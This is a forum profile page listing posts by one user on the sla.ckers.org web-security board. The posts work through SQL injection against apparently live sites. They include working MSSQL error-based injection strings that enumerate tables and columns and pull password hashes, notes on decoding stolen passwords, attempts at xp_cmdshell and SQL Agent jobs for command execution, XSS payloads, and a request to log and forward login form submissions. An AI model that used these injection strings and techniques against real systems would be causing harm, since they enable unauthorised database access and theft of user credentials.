Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Current Page: 1 of 1
Results 1 - 19 of 19
6 years ago
clooless
Just looking for a way of logging typical form POST requests such as:- <form name ="logonForm" method="post" onsubmit="return OnSignOn(this)" action="https://.../authenticate.do> Preferably without using PHP, but javascript/ajax. All same domain stuff, just logging to a file, and hopefully forwarding the requests on. Thnks.
Forum: Networking
6 years ago
clooless
Figured it out finally, turns out it's based on Vigenere polyalphabetic cypher. Only all printable ascii characters are used instead of just the alphabet. By reverse mapping the known password you find the keyword, and once you got that you can decrypt the rest. Must be an in-house SP....
Forum: SQL and Code Injection
6 years ago
clooless
Yep, tried them but no good. I have a known password which I compared to the encrypted version and it looks like some kind of XOR bit shifting. This is because in the unencrypted password there are 2 c's, which once encrypted become v7 and 2 2's which become $K i.e cc22 > v7K$ Ah well it's a challenge.
Forum: SQL and Code Injection
6 years ago
clooless
While enumerating table info from an MSSQL 2000db, data can be retrieved cleanly such as username, email etc. but I've found that the data in the password column seems to be encrypted in some way. Here are some examples:- d^1+5r_'CT Ea1'K! l[2!BpSz Just wondered if anyone has seen this type of encryption before, perhaps some kind of XOR.
Forum: SQL and Code Injection
6 years ago
clooless
Well, I got a stage further with this:- %20and%201%20in%20(+select+TOP+1+name+from+(SELECT%20top%202%20name%20FROM%20mydb..syscolumns%20WHERE%20id%20=%20(SELECT%20id%20FROM%20mydb..sysobjects%20WHERE%20name%20=%20'users')+order+by+1+DESC+)+ctable+order+by+1+ASC)-- Which brings up this error:- Syntax error converting the nvarchar value 'username' to a column of data type int. But incrementi
Forum: SQL and Code Injection
6 years ago
clooless
I'm using:- and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- to successfully enumerate user defined tables. Then I use:- SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users') to get the first column name of the 'users' table. The problem I'm having is that when I try to enumerate columns like this:- group by users.username
Forum: SQL and Code Injection
6 years ago
clooless
For some reason they decided to use SHA2 to encrypt. I figured it out anyway, if cast does not have an implied length it defaults to 30 characters. So the inject goes like this:- default.asp?id=666+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((select+ISNULL(cast(pword+as+varchar(64))%2c'null')+from+(select+top+1+*++from+(select+TOP+9+*+from+mydb..users+order+by+1+desc+)+dtable+order+by+1+asc)+fin
Forum: SQL and Code Injection
6 years ago
clooless
The following injection gives me the first 30 characters of a hash that I know is 64 characters long. Just wondering if anyone knows how to alter this injection to get all 64 characters... default.asp?id=666+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((select+ISNULL(cast(pword+as+varchar)%2c'null')+from+(select+top+1+*++from+(select+TOP+9+*+from+mydb..users+order+by+1+desc+)+dtable+order+by+1+as
Forum: SQL and Code Injection
6 years ago
clooless
Just wondering if it is possible to embed an image into a document element if the page is vulnerable to XSS in the form of:- <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> As redirection is possible using the following method:-- <xml id="X"><a><b><script>document.vulnerab
Forum: XSS Info
7 years ago
clooless
Having found a vulnerable table and extracting usernames and passwords successfully from a PostgreSQL database using injection, I would like to know if there is any more that can be achieved. The DB has no publicly accessible access so all I can hope for is some way to perform system commands or upload a file. Has anyone done anything in this area?
Forum: SQL and Code Injection
7 years ago
clooless
I would expect it to come back with "Unclosed quotation mark after the character string ' or 1=1-- " and not ' AND Status=1' Obviously the quotes are open & I tried various ways of closing them, thats's why I'm posting here.
Forum: SQL and Code Injection
7 years ago
clooless
Hi there, Just trying various injections against MSSQL on asp I keep getting the following error message based on ' or 1=1-- Unclosed quotation mark after the character string ' AND Status=1' Not sure why it comes back with that after injecting ' or 1=1-- Any have any tips on this? Thanks.
Forum: SQL and Code Injection
7 years ago
clooless
I can get a working XSS with the following:- %3B%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%0A%0A ;//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> Just need some help replacing the alert with an image. I've tried a few things using String from CharCode to decimal
Forum: XSS Info
7 years ago
clooless
By using =convert(varchar%2C0x7b5d)%2B%40%40version I can successfully get back the SQL version back in an error message. I would like to use this method to display all the available databases. I'm just not sure how the last statement decodes; as to me it looks like ,{]+@@version How does this work?
Forum: SQL and Code Injection
7 years ago
clooless
I was fuzzing through a website when I got this overflow condition when trying an sql injection ?NewsID=031003000270000 Microsoft.VisualBasic.CompilerServices.IntegerType.FromString(String Value) +110 Microsoft.VisualBasic.CompilerServices.IntegerType.FromObject(Object Value) +750 ????.Convert.ToInt(Object v, Int32 iDefault) ****.Controls.NewsDetail.get_NewsID() ****.Con
Forum: SQL and Code Injection
7 years ago
clooless
Just as a closing note, is there anything interesting you can do with the EXEC command? I guess you could create some TSQL functions or add users...or this one was good in it's day:- but to get it in one line? USE msdb EXEC sp_add_job @job_name = 'testjob1', @enabled = , @description = 'testjob1', @delete_level = 1 EXEC sp_add_jobstep @job_name = 'testjob1', @step_name = ' Exec my sql
Forum: SQL and Code Injection
7 years ago
clooless
Yes, be great if xp_cmdshell worked but it just delays for a few minutes then errors out..anyway still getting those strange responses:- 1 UNION SELECT username, password FROM USERS Invalid object name 'USERS216'. Once I figure out what this '216' is, things should be O.K
Forum: SQL and Code Injection
7 years ago
clooless
I agree with your logic, but none of the query syntax changes made any difference. Makes me think that there is partial input sanitising, just have to figure out a way around it - perhaps with character substitution. Being tricky with this balanced query gave me the name of the first column of the SysObjects table:- =union%20select%20name,1,1,1,1,1,1,1,1,1%20from%20SysObjects%20where%20schema
Forum: SQL and Code Injection
7 years ago
clooless
For a few hours after finding an injection point I'm getting some strange responses from SQL. One example is this query =-1'UNION%20SELECT%20@@version Which comes back with:- Unclosed quotation mark before the character string 'UNION SELECT @@version21'. What I dont get is why it's tacked 21 on the end. I tried a few different ways but I always seem to get 21 or 216 tacked on the end of the rep
Forum: SQL and Code Injection
Current Page: 1 of 1